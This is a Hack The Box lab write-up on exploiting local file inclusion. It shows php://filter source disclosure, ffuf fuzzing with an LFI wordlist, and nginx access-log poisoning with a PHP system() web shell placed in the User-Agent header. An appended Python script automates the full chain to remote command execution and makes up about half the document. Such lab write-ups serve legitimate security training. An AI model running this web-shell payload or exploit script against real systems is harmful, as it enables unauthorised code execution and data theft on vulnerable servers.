Hey folks! I just wrapped up the Skill Assessment for File Inclusion on Hack The Box, and I thought I'd share my journey with you. This challenge was all about assessing a web application for file inclusion and path traversal vulnerabilities. The company, INLANEFREIGHT, had concerns about their new website functionality, so our task was to dig in and see what we could exploit.
Let's break it down step by step. Buckle up, this is going to be fun!
Step 1: Checking Out the Target
We were given a target IP: 94.237.59.30:39018. First things first, I popped it open in my browser to see what we were dealing with. No detailed info was provided, so we had to start from scratch.

Step 2: Finding PHP Files
The simplest move? Check the page source code! That's where we spotted index.php. Adding it to the URL didn't give us much, since PHP executes the file instead of showing it. That's where PHP filters come into play: the php://filter wrapper's base64 encoder hands back the file's source rather than running it.


View the source code for the complete output.
Step 3: Decoding the Source Code
Using PHP filters, we could grab the encoded output. Since the content was Base64 encoded, we decoded it using:
echo '<paste your output here>' | base64 -d
This gave us a clear view of the code, and more importantly, revealed an interesting file path. Now, things were getting spicy!


Step 4: Exploring the LFI Vulnerability
Time to test Local File Inclusion (LFI). We used the LFI Wordlist from SecLists to fuzz potential payloads:
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.59.30:39018/ilf_admin/index.php?log=system.log=FUZZ' -fs 2046
Boom! The -fs 2046 option drops every response with the baseline size of 2046 bytes, so only payloads that actually changed the page were left. We found something interesting (a traversal that reached /etc/passwd) and verified it in the browser. Now, onto the next step.


Step 5: Log Poisoning
Since we identified nginx as the web server, we attempted log poisoning. nginx writes the request's User-Agent header verbatim into its access log, so if we can include that log through the LFI, any PHP code we put in the header gets executed by the server. Two things have to hold for this to work: the log must be readable by the web server user, and the payload must be valid PHP, because a parse error sitting in the log breaks every later include of it.
Here's how we did it:
Replaced /etc/passwd with /var/log/nginx/access.log.
Captured the request using Burp Suite, sent it to the repeater.
Modified the User-Agent header to:
<?php system($_GET['cmd']); ?>
Then ran our first command by appending &cmd=id to the URL that includes the log, to check execution.

Success! We got command execution. Now, onto the real goal — grabbing the flag!
Step 6: Capturing the Flag
We listed files in the root directory using:
&cmd=ls%20
And guess what? We found the flag file! Now, the final move:
&cmd=cat%20/flag_dacc60f2348d.txt
Tadaaa! We got the flag! But I won't spoil it for you — go try it yourself!
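The whole chain from Step 3 to Step 6 (reading source through php://filter, decoding it, poisoning the nginx access log via User-Agent and running commands through the include) as one script. This is an added example, not code from the write-up or from Hack The Box; the host, port and log parameter come from the post, while the traversal depth, the cmd parameter name and the sample PHP source used to exercise the helpers offline are assumptions.

```python
import base64
import re
import urllib.parse
import urllib.request

# Target details taken from the write-up; the traversal depth and the
# command parameter name are assumptions for this example.
BASE_URL = "http://94.237.59.30:39018/ilf_admin/index.php"
PARAM = "log"
TRAVERSAL = "../../../../"          # assumed depth; adjust to what the fuzzing showed
ACCESS_LOG = TRAVERSAL + "var/log/nginx/access.log"


def filter_payload(resource: str) -> str:
    """Value for the vulnerable parameter that makes PHP hand back the file's
    source base64-encoded instead of executing it. The wrapper has to be the
    whole include string, so it only works where the app does not prepend a path."""
    return "php://filter/convert.base64-encode/resource=" + resource


def decode_source(blob: str) -> str:
    """Decode the wrapper's output; tolerate whitespace from copy/paste and
    missing '=' padding, both of which make a plain `base64 -d` fail."""
    clean = re.sub(r"\s+", "", blob)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", errors="replace")


INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*([^;]+?)\s*\)?\s*;")


def find_include_targets(source: str) -> list:
    """Return the argument expression of every include/require in PHP source;
    that is where the interesting paths and the user-controlled part live."""
    return [m.group(1) for m in INCLUDE_RE.finditer(source)]


def literal_paths(expr: str) -> list:
    """Pull quoted string literals out of an include expression, e.g. the
    directory prefix glued in front of the user-supplied value."""
    return re.findall(r"""["']([^"']+)["']""", expr)


def poison_payload(cmd_param: str = "cmd") -> str:
    """PHP stager written into the log via User-Agent. Keep it one short,
    syntactically valid statement: a parse error here breaks every later include."""
    return "<?php system($_GET['%s']); ?>" % cmd_param


def exec_url(base_url, param, log_path, cmd, cmd_param="cmd") -> str:
    """URL that includes the poisoned log and passes the command to the stager."""
    q = urllib.parse.quote  # percent-encodes spaces etc., keeps '/' readable
    return "%s?%s=%s&%s=%s" % (base_url, param, q(log_path, safe="/"),
                               cmd_param, q(cmd, safe="/"))


def send_poison(base_url: str, payload: str, timeout: int = 10) -> int:
    """One request with the stager as User-Agent; nginx writes the header verbatim
    into access.log. Send it once: every request adds another copy to the log."""
    req = urllib.request.Request(base_url, headers={"User-Agent": payload})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def run_command(base_url, param, log_path, cmd, cmd_param="cmd", timeout=10) -> str:
    """Include the poisoned log and return the page body, which now carries the
    command output in between the logged request lines."""
    url = exec_url(base_url, param, log_path, cmd, cmd_param)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed stand-in for the wrapper's output (not the lab's real source):
SAMPLE_SOURCE = '<?php\n$log = $_GET["log"];\ninclude("../logs/" . $log);\n?>\n'
SAMPLE_B64 = base64.b64encode(SAMPLE_SOURCE.encode()).decode()


if __name__ == "__main__":
    import sys
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id"
    send_poison(BASE_URL, poison_payload())
    print(run_command(BASE_URL, PARAM, ACCESS_LOG, cmd))
```

Run it against a live lab instance with the command as the first argument, for example `python3 lfi_chain.py 'cat /flag_dacc60f2348d.txt'`. The body that comes back contains every line ffuf left in the access log, so expect a lot of noise around the command output; grep for the flag prefix or run the command with a marker around it. The payload travels in the header unencoded, which is exactly what the Burp Repeater step above does by hand.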
This was a really fun challenge, testing everything from LFI to log poisoning. It just goes to show that thinking outside the box (or should I say, inside the logs?) really makes a difference.